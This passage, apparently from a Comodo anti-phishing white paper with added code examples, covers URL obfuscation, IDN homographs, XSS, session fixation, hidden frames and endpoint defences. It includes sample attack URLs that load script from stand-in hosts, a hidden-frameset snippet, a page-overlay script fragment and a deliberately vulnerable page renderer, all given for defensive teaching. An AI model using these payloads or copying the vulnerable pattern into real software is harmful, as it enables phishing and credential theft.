• Hexadecimal – http://0xD2.0x86.0xA1.0x23/ or even http://0xD286A123/

• In some cases, it may be possible to mix formats (e.g. http://0322.0x86.161.0043/).
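The following worked example is an addition to this paper, not Comodo's own code. It normalizes the alternative IPv4 spellings listed above the way a WHATWG-conformant browser does, so that a URL filter compares hosts after normalization rather than as raw strings, and shows that the browser's own parser discards the "username:password@" decoy from the friendly-login URLs. It runs under Node.js, whose global URL class implements the same parser as current browsers; the host strings are the paper's examples and the flag names are assumed.

```javascript
// Added example (not from the Comodo paper). Node.js.

// Parse one dotted component: "0x.." is hex, a leading "0" is octal, else decimal.
function parseIPv4Number(part) {
  let radix = 10;
  if (/^0[xX]/.test(part)) { part = part.slice(2); radix = 16; }
  else if (part.length > 1 && part[0] === '0') { part = part.slice(1); radix = 8; }
  if (part === '') return 0; // "0x" or "0" alone is zero
  const valid = { 16: /^[0-9a-fA-F]+$/, 8: /^[0-7]+$/, 10: /^[0-9]+$/ }[radix];
  return valid.test(part) ? parseInt(part, radix) : null;
}

// Simplified WHATWG IPv4 parser: returns dotted-decimal, or null when the host
// is not a numeric literal. Fewer than four parts are allowed; the last part
// then carries the remaining low-order bytes (the "dword" form is the one-part case).
function ipv4FromHost(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop(); // trailing dot
  if (parts.length === 0 || parts.length > 4) return null;
  const nums = parts.map(parseIPv4Number);
  if (nums.some((n) => n === null)) return null;
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  if (nums[nums.length - 1] >= 256 ** (5 - nums.length)) return null;
  let value = nums[nums.length - 1];
  for (let i = 0; i < nums.length - 1; i++) value += nums[i] * 256 ** (3 - i);
  return [value >>> 24, (value >>> 16) & 255, (value >>> 8) & 255, value & 255].join('.');
}

// The host the browser will actually connect to, ignoring any "user:pass@" decoy.
function browserHostname(url) {
  return new URL(url).hostname;
}

// Flag URLs whose displayed text and real destination are likely to diverge:
// a userinfo component, or a numeric host not written in dotted decimal.
function obfuscationFlags(url) {
  const u = new URL(url);
  const flags = [];
  if (u.username || u.password) flags.push('userinfo-decoy');
  const rawHost = url.replace(/^[a-z]+:\/\/(?:[^@\/]*@)?/i, '').split(/[\/:?#]/)[0];
  const ip = ipv4FromHost(rawHost);
  if (ip !== null && ip !== rawHost) flags.push(`numeric-host:${ip}`);
  return flags;
}

// The paper's examples, all of which name the same server.
const EXAMPLES = [
  'http://210.134.161.35/',
  'http://3532038435/',
  'http://0322.0206.0241.0043/',
  'http://0xD2.0x86.0xA1.0x23/',
  'http://0xD286A123/',
  'http://0322.0x86.161.0043/',
  'http://abcbank.com:ebanking@fakesite.com/phishing/fakepage.htm',
];
for (const ex of EXAMPLES) {
  console.log(ex, '->', browserHostname(ex), obfuscationFlags(ex));
}
```

The point for a filter or mail gateway is that matching on the literal string "210.134.161.35" catches only the first line; the remaining five spellings all reach the same host, and only a canonicalizing parser sees that.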

URL Obfuscation

To support multiple languages, Internet software such as browsers and email clients accepts several alternative encodings of the same data. By using one (or a combination) of these encodings, a phisher can conceal the actual destination and nature of a malicious URL. Most web browsers accept these encodings, and web servers and their custom applications may interpret them differently. Prominent encoding schemes include:

• Escape Encoding – Escape encoding, also called percent-encoding, is the accepted method of representing characters within a URL that would otherwise need special syntax handling. The character is replaced by a three-character sequence: the percent sign '%' followed by the two hexadecimal digits of the octet code of the original character. For example, the US-ASCII character set represents a space with octet code 32, or hexadecimal 20, so its URL-encoded representation is %20.

• Unicode Encoding – Unicode is an international standard that assigns every character in every script used in the world a unique code point, conventionally written as a hexadecimal (base 16) number of four or more digits. The original design used a two-byte encoding for each character, allowing 65,536 characters in a single font instead of 256; the standard has since grown beyond that range, and encodings such as UTF-16 and UTF-8 represent it. The letter 'a' therefore always has the same character code, no matter what system you are working on. Unicode does not directly handle different representations of the same character in different languages (such as characters shared between Japanese, Korean, and simplified and traditional Chinese that may be written differently in some of those languages), but it does include compatibility with most pre-existing encoding standards.

• Inappropriate UTF-8 Encoding – One of the most commonly used formats, UTF-8, preserves the full US-ASCII range as single bytes. Its multi-byte structure also allows an ASCII character to be written as a longer 'overlong' sequence. RFC 3629 forbids such sequences and a conforming decoder rejects them, but many hand-rolled decoders accept them, which provides many opportunities for disguising standard characters in longer escape-encoded sequences. For example, the full stop character '.' may be represented as %2E, or as the overlong forms %C0%AE, %E0%80%AE, %F0%80%80%AE, %F8%80%80%80%AE, or even %FX%80%80%80%80%AE.

• Multiple Encoding – Various guidelines and RFCs carefully explain how to decode escape-encoded characters and warn of the dangers of decoding multiple times and at multiple layers of an application. However, many applications still parse escape-encoded data more than once. Consequently, phishers may further obfuscate the URL by encoding characters multiple times (and in different fashions). For example, the back-slash '\' character is encoded as %5C, but this could be extended to %255C, or %35C, or %%35%63, or %25%35%63, etc., relying on the application to decode the result a second time.
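The following worked example is an addition to this paper, not Comodo's own code. It contrasts what a strict UTF-8 decoder and a lenient one make of the escape sequences listed above, and walks the multiply-encoded back-slash through successive decoding passes so that the number of passes an attacker is relying on becomes visible. It runs under Node.js; the inputs are the paper's own examples, and the lenient decoder is a deliberately sloppy one written here to model older or hand-rolled implementations.

```javascript
// Added example (not from the Comodo paper). Node.js.

// Turn %XX triplets into bytes; anything that is not a valid triplet is kept as
// a literal byte, which is how "%%35%63" survives the first decoding pass.
function percentDecodeToBytes(str) {
  const bytes = [];
  for (let i = 0; i < str.length; i++) {
    const hex = str.slice(i + 1, i + 3);
    if (str[i] === '%' && /^[0-9a-fA-F]{2}$/.test(hex)) {
      bytes.push(parseInt(hex, 16));
      i += 2;
    } else {
      bytes.push(str.charCodeAt(i) & 0xff); // input is assumed to be ASCII
    }
  }
  return bytes;
}

// Strict UTF-8 (RFC 3629): overlong forms such as C0 AE are rejected (null).
function strictUtf8(bytes) {
  try {
    return new TextDecoder('utf-8', { fatal: true }).decode(Uint8Array.from(bytes));
  } catch {
    return null;
  }
}

// Lenient UTF-8 of the kind found in sloppy decoders: it trusts the lead byte's
// length marker and never checks for the shortest form, so C0 AE, E0 80 AE,
// F0 80 80 AE and F8 80 80 80 AE all come out as ".".
function lenientUtf8(bytes) {
  let out = '';
  for (let i = 0; i < bytes.length; ) {
    const b = bytes[i++];
    let extra = 0;
    let cp = b;
    if (b >= 0xfc) { extra = 5; cp = b & 0x01; }
    else if (b >= 0xf8) { extra = 4; cp = b & 0x03; }
    else if (b >= 0xf0) { extra = 3; cp = b & 0x07; }
    else if (b >= 0xe0) { extra = 2; cp = b & 0x0f; }
    else if (b >= 0xc0) { extra = 1; cp = b & 0x1f; }
    for (let k = 0; k < extra && i < bytes.length; k++) cp = (cp << 6) | (bytes[i++] & 0x3f);
    out += String.fromCodePoint(cp);
  }
  return out;
}

// One lenient decoding pass over an escape-encoded string.
function decodeOnce(str) {
  return lenientUtf8(percentDecodeToBytes(str));
}

// Decode until the string stops changing and return every intermediate form.
function decodeRepeatedly(str, maxRounds = 5) {
  const forms = [str];
  for (let r = 0; r < maxRounds; r++) {
    const next = decodeOnce(forms[forms.length - 1]);
    if (next === forms[forms.length - 1]) break;
    forms.push(next);
  }
  return forms;
}

// True when the sequence only means something to a lenient decoder, i.e. a
// strict decoder rejects it outright: a cheap signal for a URL filter.
function hasOverlongEncoding(str) {
  const bytes = percentDecodeToBytes(str);
  return strictUtf8(bytes) === null && lenientUtf8(bytes).length > 0;
}

for (const s of ['%2E', '%C0%AE', '%E0%80%AE', '%F0%80%80%AE', '%F8%80%80%80%AE']) {
  console.log(s, 'strict:', strictUtf8(percentDecodeToBytes(s)), 'lenient:', lenientUtf8(percentDecodeToBytes(s)));
}
for (const s of ['%5C', '%255C', '%%35%63', '%25%35%63']) {
  console.log(s, '->', decodeRepeatedly(s));
}
```

A filter that decodes exactly once and then rejects overlong sequences sees "%255C" as the harmless text "%5C"; the vulnerable application behind it, decoding a second time, sees a back-slash. Decoding to a fixed point on the filter side, as decodeRepeatedly does, closes that gap.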

IDN Obfuscation Methods

Punycode, defined in RFC 3492, describes itself as a "Bootstring" encoding of Unicode strings into the limited character set supported by the Domain Name System. The encoding is used as part of IDNA, a system enabling the use of internationalized domain names in all languages supported by Unicode, where the burden of translation lies entirely with the user application (e.g. the web browser).


The encoding is applied separately to each component of a domain name which is not representable solely within the ASCII character set, and the reserved prefix 'xn--' is added to the translated Punycode string. For example, bücher becomes bcher-kva in Punycode, and therefore the domain name bücher.ch is represented as xn--bcher-kva.ch in IDNA.

The issue, however, is that look-alike spellings of well-recognized domain names, such as "http://www.pаypal.com/" with a Cyrillic 'а' in place of the Latin 'a', which the browser's Punycode handler encodes as www.xn--pypal-4ve.com, can be used in attacks on IDN-compliant browsers such as Mozilla, Firefox, Opera and Safari, which display the Unicode form in the address bar.
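The following worked example is an addition to this paper, not Comodo's own code. It implements the RFC 3492 Punycode encoder, applies it per label with the "xn--" prefix, and adds the mixed-script check that browsers later adopted to decide whether to show a label in Unicode or fall back to its Punycode form. It runs under Node.js; the domain names are the paper's own examples. Real IDNA also case-folds and NFC-normalizes each label before encoding; that preparation step is omitted here.

```javascript
// Added example (not from the Comodo paper). Node.js.

// RFC 3492 parameters.
const BASE = 36, TMIN = 1, TMAX = 26, SKEW = 38, DAMP = 700, INITIAL_BIAS = 72, INITIAL_N = 128;

// Bias adaptation (RFC 3492 section 6.1).
function adapt(delta, numPoints, firstTime) {
  delta = firstTime ? Math.floor(delta / DAMP) : delta >> 1;
  delta += Math.floor(delta / numPoints);
  let k = 0;
  while (delta > ((BASE - TMIN) * TMAX) >> 1) {
    delta = Math.floor(delta / (BASE - TMIN));
    k += BASE;
  }
  return k + Math.floor(((BASE - TMIN + 1) * delta) / (delta + SKEW));
}

// Digits 0-25 are a-z, 26-35 are 0-9.
function digit(d) {
  return String.fromCharCode(d < 26 ? d + 97 : d - 26 + 48);
}

// Encode one label (RFC 3492 section 6.3): copy the basic (ASCII) code points,
// then emit generalized variable-length integers for each non-ASCII insertion.
function punycodeEncode(label) {
  const cps = Array.from(label, (ch) => ch.codePointAt(0));
  let out = cps.filter((c) => c < 0x80).map((c) => String.fromCharCode(c)).join('');
  const basicCount = out.length;
  if (basicCount > 0) out += '-';
  let h = basicCount, n = INITIAL_N, delta = 0, bias = INITIAL_BIAS;
  while (h < cps.length) {
    const m = Math.min(...cps.filter((c) => c >= n)); // next code point to handle
    delta += (m - n) * (h + 1);
    n = m;
    for (const c of cps) {
      if (c < n) delta++;
      if (c === n) {
        let q = delta;
        for (let k = BASE; ; k += BASE) {
          const t = k <= bias ? TMIN : k >= bias + TMAX ? TMAX : k - bias;
          if (q < t) break;
          out += digit(t + ((q - t) % (BASE - t)));
          q = Math.floor((q - t) / (BASE - t));
        }
        out += digit(q);
        bias = adapt(delta, h + 1, h === basicCount);
        delta = 0;
        h++;
      }
    }
    delta++;
    n++;
  }
  return out;
}

// IDNA ToASCII step for a whole domain name: ASCII labels pass through,
// every other label gets the xn-- prefix and its Punycode form.
function toAsciiDomain(domain) {
  return domain
    .split('.')
    .map((label) => (/^[\x00-\x7f]*$/.test(label) ? label : 'xn--' + punycodeEncode(label)))
    .join('.');
}

// Labels that mix Latin with another script: the classic homograph signal.
function mixedScriptLabels(domain) {
  const others = ['Cyrillic', 'Greek', 'Armenian'];
  return domain.split('.').filter(
    (label) =>
      /\p{Script=Latin}/u.test(label) &&
      others.some((s) => new RegExp(`\\p{Script=${s}}`, 'u').test(label))
  );
}

const LOOKALIKE = 'www.p\u0430ypal.com'; // U+0430 is the Cyrillic small letter a
console.log(toAsciiDomain('b\u00fccher.ch'));      // xn--bcher-kva.ch
console.log(toAsciiDomain(LOOKALIKE));             // www.xn--pypal-4ve.com
console.log(mixedScriptLabels(LOOKALIKE));         // [ 'pаypal' ]
```

Node's own require('url').domainToASCII gives the reference answer for comparison. A label that fails the mixed-script test is the one a browser should render as Punycode in the address bar, so that "xn--pypal-4ve" is what the user sees.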

Cross-site Scripting Attacks

The ever-increasing complexity of websites with dynamic content has created new opportunities for the phisher. Dynamic content is delivered by web applications, which suffer from a threat that static websites do not: cross-site scripting (XSS, sometimes abbreviated CSS in older literature). XSS attacks succeed by maliciously altering the URL of the target e-commerce site, through a crafted URL or by injecting code into a web application or data field. In most cases these attacks are the result of poor web application development. They can be carried out using several techniques, but for phishing specifically the attacker must use a URL-based attack.

The most popular methods of launching URL-based XSS attacks include:

HTML substitution:

http://abcbank.com/ebanking?URL=http://fakesite.com/phishing/fakepage.htm

In this attack, the web application blindly accepts whatever follows the legitimate 'ebanking?URL=' parameter, allowing the phisher to substitute his own spoof page. Strictly this is an open redirect or frame injection rather than script injection, but it is exploited in the same way and fixed by the same kind of input validation.

Script Content Embedding

http://abcbank.com/ebanking?page=1&client=<SCRIPT>fakecode...

The wholesale insertion of malicious script through a parameter of the ebanking component of the URL.

Forced loading of external scripting code

http://abcbank.com/ebanking?page=1&response=evilsite.com%21fakecode.js&go=2

This method instructs the browser to load a script from the phisher's server rather than from abcbank.com.

Cross-site scripting in a real-life situation

A customer of ABC Bank has received an email asking him to update his account details by clicking on the following URL:

http://abcbank.com/ebanking?URL=http://fakesite.com/phishing/fakepage.htm

The URL has been modified by the phisher so that it connects to the legitimate bank web site, but then references a form page on an external server. This is due to weak web application coding that accepts the insertion of arbitrary URLs, enabling the phisher to substitute the real embedded authentication page with one of his own: http://fakesite.com/phishing/fakepage.htm

Figure: Cross-site scripting attack

XSS attacks are particularly dangerous because the victim has no way of knowing that the embedded authentication page is not genuine. The attacker could also disguise the URL using one of the methods outlined earlier. For example,

http://fakesite.com/phishing/fakepage.htm may instead become:

http%3A%2F%2F3515261219%2Fphishing%C0%AEfakepage%2Ehtm
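The following worked example is an addition to this paper, not Comodo's own code. It is a toy version of the ABC Bank 'ebanking' page builder that reproduces the two defects described above (an unchecked URL parameter used as a frame source, and a client parameter written into the page unescaped) beside a hardened version that validates the frame target against the site's own origin and HTML-escapes the client name. It runs under Node.js; the query strings are the paper's examples, while the HTML template, the fallback page and the site origin are assumed.

```javascript
// Added example (not from the Comodo paper). Node.js.

// Vulnerable: whatever arrives in ?URL= becomes the frame source, and ?client=
// is echoed into the page raw. Both defects are the ones the paper describes.
function renderVulnerable(query) {
  const p = new URLSearchParams(query);
  const frameSrc = p.get('URL') || '/ebanking/login.htm';
  const client = p.get('client') || 'guest';
  return `<h1>Welcome ${client}</h1>\n<iframe src="${frameSrc}"></iframe>`;
}

// Minimal HTML escaping for text and attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

const SITE_ORIGIN = 'https://abcbank.com'; // assumed for the example

// Only targets on the site's own origin may be framed; everything else,
// including protocol-relative "//fakesite.com/..." and look-alike hosts such
// as abcbank.com.evil.net, falls back to the default login page.
function safeFrameSrc(candidate) {
  const fallback = '/ebanking/login.htm';
  if (!candidate) return fallback;
  let target;
  try {
    target = new URL(candidate, SITE_ORIGIN); // relative paths resolve on-site
  } catch {
    return fallback;
  }
  if (target.origin !== SITE_ORIGIN) return fallback;
  return target.pathname + target.search;
}

// Hardened: validated frame target, escaped output.
function renderHardened(query) {
  const p = new URLSearchParams(query);
  const frameSrc = escapeHtml(safeFrameSrc(p.get('URL')));
  const client = escapeHtml(p.get('client') || 'guest');
  return `<h1>Welcome ${client}</h1>\n<iframe src="${frameSrc}"></iframe>`;
}

const ATTACKS = [
  'URL=http://fakesite.com/phishing/fakepage.htm',
  'page=1&client=<SCRIPT>fakecode()</SCRIPT>',
  'URL=//fakesite.com/phishing/fakepage.htm',
];
for (const q of ATTACKS) {
  console.log('--- vulnerable ---\n' + renderVulnerable(q));
  console.log('--- hardened ---\n' + renderHardened(q));
}
```

The validation in safeFrameSrc deliberately compares the parsed origin rather than testing whether the string starts with "http://abcbank.com", because the latter check is passed by http://abcbank.com.evil.net and by the userinfo trick described in the Friendly Login URLs section.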

Preset Session Attack

HTTP and HTTPS are stateless protocols, which means they treat each request as an independent transaction, unrelated to any previous request. Consequently, web-based applications need to carry information entered in one part of a session across to the next by some other means of tracking or managing state (e.g. user authentication details and everything entered into web form fields up to that point). The most common way of tracking state within a web application is through Session Identifiers (SessionIDs), which may be carried in cookies, hidden form fields or fields within page URLs.

Unfortunately, many web-based applications deploy poor state tracking that allows the client to define the SessionID.

The SessionID is used by the web application to track the customer’s details and submitted information but, crucially, this SessionID must be authenticated. This is (usually) done by the user logging in with a username and password. Although this login information will grant the user access to restricted content, the SessionID exists independently and can be preset by a phisher.

Typically in this type of attack, the victim receives a link to the genuine ABC Bank server that contains a preset SessionID. All the phisher needs to do is wait for that SessionID to be authenticated against a real user's login details. The phisher's system therefore continually polls the bank's web application server for restricted content, such as a funds transfer page, using the preset SessionID; until a customer authenticates that ID with his or her login details, the attacker receives only error messages.



Once the victim has followed the link in the email, logged into their account and made the preset SessionID ‘live’, the attacker will be able to access the restricted content. This is because the bank’s web application server will now accept any connections using the authenticated SessionID as it is the only state management element in the current session. The attacker has used a ‘brute force’ tactic of waiting for someone to authenticate his preset SessionID to access restricted content.

For example,

The phisher has sent out multiple emails to ABC Bank customers asking them to update their accounts. The supplied link contains the preset SessionID 6hJ23pw4t5cQ

https://abcbank.com/ebanking?session=6hJ23pw4t5cQ&Login=True

Meanwhile, the phisher is continually polling the bank server with the preset SessionID in the hope that a customer will authenticate it with their login details. Once this happens he can enter restricted areas such as the funds transfer page: https://abcbank.com/ebanking?session=6hJ23pw4t5cQ&Transfer=True. The defence is for the server to issue a fresh SessionID of its own at login and to ignore any value supplied by the client.

Hidden Attacks

Another method of deceiving customers as to a web site’s true identity is to manipulate the physical appearance of a web page using HTML, DHTML and other scriptable code. The hacker will disguise fake content and its true source using these techniques to make customers believe they are viewing content from the genuine e-commerce site instead of content hosted on a hacker’s server. Types of hidden attack include hidden frames, overriding page content and graphical substitution.

Hidden Frames

Frames enjoy widespread cross-browser support and are easy to code, making them a popular and convenient vehicle for hidden attacks. Consider the following example, in which two frames are defined. The first frame contains the legitimate site; the second references the attacker's chosen content and is given whatever space is left after the first frame's 100%, i.e. none, so it is invisible to the customer. However, the page referenced in the 'hidden' frame can contain a host of instructions to deliver external content (e.g. overriding page content or substituting graphics), to capture personal data, or to run key-logging or screen-grabbing code.

<frameset rows="100%,*" framespacing="0">

<frame name="real" src="http://abcbank.com/" scrolling="auto">

<frame name="hiddenContent" src="http://fakesite.com/bad.htm" scrolling="auto">

</frameset>

Hidden frames may be used for:

• Hiding the source address of the attacker's content server. Only the URL of the master frameset document is visible in the browser interface unless the user follows a link with its target attribute set to "_top".

• Providing a fake secure HTTPS wrapper for the site's content (forcing the browser to display a padlock or similar visual security cue) while still using insecure HTTP for the hidden page content and operations.

• Hiding HTML code from the customer. Customers will not be able to view the hidden pages code through the standard “View Source” functions available to them.

• “Page Properties” will only indicate the top most viewable page source in most browser software.

• Loading images and HTML content in the background for later use by a malicious application.

• Storing and implementing background code operations that will report back to the attacker what the customer does in the “real” web page.

• Combined with client-side scripting languages, it is possible to replicate functionality of the browser toolbar; including the representation of URL information and page headers.

Overriding Page Content

Phishers can override existing page content, such as graphics, using a variety of methods. Perhaps the most popular technique for 'superimposing' fake content on a legitimate page uses the HTML DIV element, which defines an area of the page into which content can be placed. Combined with a style attribute, a phisher can absolutely position fake content on top of the organization's real content. The fake content can be injected into the legitimate site through a very long URL or by referencing a malicious script. For example, the following code segment contains the first three statements of a small JavaScript file (e.g. fake.js) for overwriting the page's content.

var d = document;

d.write('<DIV id="fake" style="position:absolute; left:200px; top:200px; z-index:2"><TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');

d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');

Using this method, an attacker can generate a completely spurious web page on top of the real page.

Graphical Substitution

Browsers such as Internet Explorer and Mozilla Firefox are problematic for phishers because they include visual clues to the true identity of a website: the address bar displaying the URL, the padlock denoting SSL encryption and the security zone indicator. However, by using scripting languages such as VBScript and JavaScript, attackers can place authentic-looking graphics over these areas, obscuring the actual URL with an image showing the URL of the legitimate organization.

In the following real world example, the phisher has sent the victim an email urging him to update his account by clicking a link included in the message body. The link leads to a fake site containing an exact copy of the real site. The phisher then carefully positions fake status bar and padlock/zone images over the browser to disguise the tell-tale information and assure the customer that the site is genuine.


Figure: The phisher overlays a fake address bar, padlock logo and zone information over the actual browser information.

The Phisher must use browser specific graphics (or risk overlaying an Internet Explorer address bar over a Mozilla browser) but it is relatively simple for the attacker’s fake website to determine the client’s browser software and version and prepare appropriate graphics in each instance.

This still leaves the problem that the fake graphics are 'flat' whereas the real browser elements are interactive. Unfortunately, phishers can blend graphical substitution with a wide range of other browser simulation techniques, such as JavaScript, in order to fully emulate the functionality of a secure web site. These include:

• Fake Context sensitive “right-click” functionality and menus

• Presenting false popup messages just as the real browser or web application would

• Displaying fake SSL certificate details when reviewing page properties or security settings – through the use of images.

• Using the Internet Explorer-specific window.createPopup() and popup.show() script methods, an attacker can place a chromeless window anywhere on the customer's desktop, even outside the browser window, and construct a fake interface to capture and manipulate what the customer sees.

Observing Customer Data

Phishers can also steal confidential user information by observing the customer. Key-loggers and screen-grabbers record data entered by a customer and store it locally for the attacker to retrieve later. The method of retrieval varies with the particular attack. One method is for the victim's machine to send a continuous stream of data to the attacker through a custom sender/receiver pair; this 'real time' collection usually requires the attacker to maintain a connection to the victim's computer. Alternatively, the captured data can be stored on the victim's local computer and uploaded to the attacker's server via FTP, HTTP, SMTP, etc. Finally, the observation software may contain additional code that lets the attacker connect to the victim's machine remotely and collect the data at their convenience.

Key-logging

A key-logger is a program that runs in the background, recording every keystroke the victim makes. Once logged, keystrokes can be hidden on the local machine for later retrieval or shipped raw to the attacker, who then combs through them for passwords or other information that could be used to compromise the system or in a social engineering attack. In phishing-related key-logging, the attacker aims to record the authentication information that a customer enters into a web application login page. This usually involves client-side scripts that record keystrokes only within the web browser, giving the phisher a more concise and relevant set of keystrokes from which to extract confidential data.

Screen Grabbing

One of the more recent attack vectors that phishers have developed is code that takes a screen shot of data entered into web-based applications, particularly the login fields and other sensitive areas. To keep data transfer to the attacker's server to a minimum, such software captures only the relevant region of the screen, e.g. just the login and password fields. This type of attack is particularly pernicious because it bypasses some of the on-screen keyboards and similar applications that financial organizations have developed to defeat traditional key-loggers.

Client-side Vulnerabilities

The increased sophistication of browsers may enhance the surfing experience of users, but it also represents a double-edged sword in the guise of increasing vulnerabilities. With each incremental leap in functionality there is often a corresponding increase in vulnerabilities that can be exploited by an attacker. Third-party add-ons such as Flash and RealPlayer not only increase the potential for new security risks, but also distribute the responsibility for patching amongst more and more vendors.

User laxity is another serious concern in the battle against phishing, with home users being traditionally slow to implement vital security updates to their software, often taking action only when something goes wrong.


IDENTITY ASSURANCE SOLUTIONS

Today’s portfolio of solutions

As the previous section highlighted, there are numerous attack methods available to criminals who wish to perpetrate fraud. Consequently, over the last 12-18 months a number of solutions have also been brought to the market to address these issues.

These solutions can be categorized under three headings.

• Client/User

• Server/Enterprise

• Externally Managed Services, alert services

Client/User

Who is most at risk from an identity theft attack? The direct cost in most cases lies with the individual or home user targeted by the attack, as it is their bank account which is cleared out. However, so far, in order to maintain their reputation in the market, most banks or enterprises have aided customers who have been duped. This cannot continue, and as such the banking community and the community of solutions providers have formed various groups in order to tackle the biggest problem – user education. Groups such as the Anti-Phishing Working Group (www.antiphishing.org) and others have been formed out of necessity to be able to focus efforts to educate users. March 2005 will also see the launch of ‘Project Endurance’, which again revolves around a major media campaign to educate users and bring confidence back.

The Anti-Phishing Working Group (APWG) is an industry association focused on eliminating the identity theft and fraud that result from the growing problem of phishing and email spoofing.

APWG Members

- Over 1036 members

- Over 659 companies

- 8 of the top 10 US banks

- 4 of the top 5 US ISPs

- Over 100 technology vendors

- Law enforcement from Australia, Canada, UK, USA

At the client/user side, insurance against identity theft can be bought; however, proactive steps can also be taken, grouped as follows:-

• Desktop EndPoint Security Solutions

• Digital Signing and Validation of e-mails

• General security awareness and best practices including choice of browser technology.

Desktop – Endpoint Security Solutions.

‘Endpoint security solutions’ is the term that refers to the swathe of solutions now available to users to combat ‘malware’ (a generic term now used to describe viruses, spyware, Trojans and malicious code existing on the Internet). The products available to combat these issues have themselves diversified into many flavors, with major vendors such as Symantec, McAfee, Microsoft and Trustix providing one or more solutions:-

• AntiVirus

• Personal Firewall

• Spyware detection and removal

• AntiSpam

• Intrusion Detection

• Free products including browser enhancement tools

Many end users are familiar with the concept of AntiVirus protection; however, many still choose to “take a chance” and do not adequately protect themselves to the level they should, even though many providers do offer free versions. It is this level of awareness which is the biggest barrier to adoption, yet it is the complexity and sheer number of technologies available that bamboozles users into doing nothing.

As a minimum, products that protect identity should have:-

• The ability to detect and block “on the fly” attempts to install malicious software (such as Trojan horses, key-loggers, screen-grabbers and backdoors) through email attachments, file downloads, dynamic HTML and scripted content.

• The ability to identify common Spam delivery techniques and quarantine offending messages.

• The ability to pull down the latest anti-virus and anti-spam signatures and apply them to the intercepting protection software. Given the variety in spamming techniques, this process should be scheduled as a daily activity.

• The ability to detect and block unauthorised out-bound connections from installed software or active processes. For example, if the customer’s host has been previously compromised, the protection solution must be able to query the authenticity of the out-bound connection and verify it with the user. The difficulty here occurs when users have no idea what is or is not supposed to be making a call to the Internet.

• The ability to detect anomalies in network traffic profiles (both inbound and outbound) and initiate appropriate counter-measures. For instance, detecting that an inbound HTTP connection has been made and substantial outbound SSL traffic begins on a non-standard port.

• The ability to block inbound connections to un-associated or restricted network ports and their services.


• The ability to identify common Spyware installations and the ability to prevent installation of the software and/or blocking outbound communications to known Spyware monitoring sites.

• Automatically block outbound delivery of sensitive information to suspected malicious parties. Sensitive information includes confidential financial details, credit card numbers, pass codes and contact information. Even if the customer cannot visually identify the true web-site that will receive the sensitive information, some off the shelf software solutions can.
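The outbound-connection and traffic-anomaly checks in the list above can be expressed as a small detection rule. The following Go program is an added example written for this page, not code from Comodo or any of the vendors named; its connection-record format, the list of ‘standard’ TLS ports, the 100 KB volume threshold and the sample records are all constructed assumptions.

```go
package main

import "fmt"

// Conn is one connection record of the kind a host firewall or flow log
// keeps. The format is constructed for this example and belongs to no
// product named in the text.
type Conn struct {
	Dir     string // "in" or "out"
	Proto   string // application protocol as classified by the sensor
	Process string // local program that owns the socket
	Port    int    // remote port for outbound, local port for inbound
	Bytes   int    // bytes sent (out) or received (in)
}

// Alert points at the offending record and says why it was flagged.
type Alert struct {
	Index  int
	Reason string
}

// standardTLSPorts lists ports on which TLS traffic is normally expected.
var standardTLSPorts = map[int]bool{443: true, 465: true, 993: true, 995: true}

// bulkBytes is the constructed threshold for "substantial" outbound volume.
const bulkBytes = 100 * 1024

// Analyze applies two of the checks listed above to a record sequence:
// an outbound connection from a process the user has not approved, and
// bulk outbound TLS on a non-standard port once an inbound HTTP
// connection has been seen on the host.
func Analyze(records []Conn, approved map[string]bool) []Alert {
	var alerts []Alert
	inboundHTTPSeen := false
	for i, c := range records {
		if c.Dir == "in" {
			if c.Proto == "http" {
				inboundHTTPSeen = true
			}
			continue
		}
		if !approved[c.Process] {
			alerts = append(alerts, Alert{i, fmt.Sprintf(
				"unapproved outbound %s connection by %q to port %d", c.Proto, c.Process, c.Port)})
		}
		if inboundHTTPSeen && c.Proto == "tls" && !standardTLSPorts[c.Port] && c.Bytes >= bulkBytes {
			alerts = append(alerts, Alert{i, fmt.Sprintf(
				"bulk TLS upload (%d bytes) to non-standard port %d after inbound HTTP", c.Bytes, c.Port)})
		}
	}
	return alerts
}

// sampleRecords is a constructed sequence: normal browsing and mail,
// then an inbound HTTP connection accepted by an unknown program that
// goes on to push data out over TLS on port 8443.
func sampleRecords() []Conn {
	return []Conn{
		{"out", "http", "firefox.exe", 80, 4 * 1024},
		{"out", "tls", "firefox.exe", 443, 250 * 1024},
		{"in", "http", "svchost32.exe", 80, 1024},
		{"out", "tls", "svchost32.exe", 8443, 300 * 1024},
		{"out", "smtp", "outlook.exe", 25, 2 * 1024},
	}
}

func main() {
	approved := map[string]bool{"firefox.exe": true, "outlook.exe": true}
	for _, a := range Analyze(sampleRecords(), approved) {
		fmt.Printf("record %d: %s\n", a.Index, a.Reason)
	}
}
```

With the two browsers and mail client approved, only the fourth record is flagged, once for each rule; with an empty approval list every outbound record is flagged, which is the "users have no idea what should be calling out" problem from the list in code form.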

Do Desktop Endpoint Security Solutions adequately protect end users? – No. As with any layered security defense solution, they defend against a proportion of attacks.

The major barrier to adoption across both the single incidence home user segment of the market and the mass deployment enterprise market is the complexity and sheer number of solutions needed to be fully protected.

Again the number of solutions represents a significant outlay in terms of cost, time, effort and maintenance for users to initially become and then remain protected.

Digitally Signing e-mails

E-mail clients have been shaped by the demands of enterprise users to include more and more advanced features that provide few advantages to the average home user. The mere fact that users are able to view mail in HTML format means that many URL obfuscation techniques and embedded scripting techniques succeed. Where possible, the ability of e-mail clients to render HTML should be suppressed in favour of plain text, which, although it sometimes gives inconsistent formatting, significantly improves security on the client machine.

Legislation is already in place, such as EU Council Directive 2001/115/EC and HM Customs and Excise 700-63 for electronic invoicing, requiring the use of digitally signed mails, with providers such as TrustSign offering compliance solutions: http://www.trustsign.co.uk/products/services/700-63.html

The same is true for e-mail attachments. Common mail clients like Outlook maintain a list of ‘dangerous’ file extensions (.exe, .pif, .vbs etc.). By default users should save attachments to their system and scan the files prior to opening, but again this is driven by user awareness, especially where worms mail themselves to personal address book contacts with funny jokes or other humorous attachments.

A growing proportion of enterprises now look to encrypt sensitive corporate information en route between mail servers. Likewise, businesses are turning to digitally signed e-mail as an option to provide authenticity and integrity to messages sent to their client base and, to those customers with their own digital certificates, confidentiality.

